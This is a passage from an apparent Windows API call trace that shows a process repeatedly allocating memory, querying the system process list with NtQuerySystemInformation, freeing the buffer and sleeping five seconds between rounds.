NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.859] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.866] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.867] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.874] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.883] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.892] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.899] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.906] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.915] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.923] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.930] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.937] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.945] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.953] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.961] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.971] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.989] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.990] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0259.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0259.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0259.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0259.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0259.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0259.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0259.999] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.002] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.008] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.016] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.027] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.037] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, 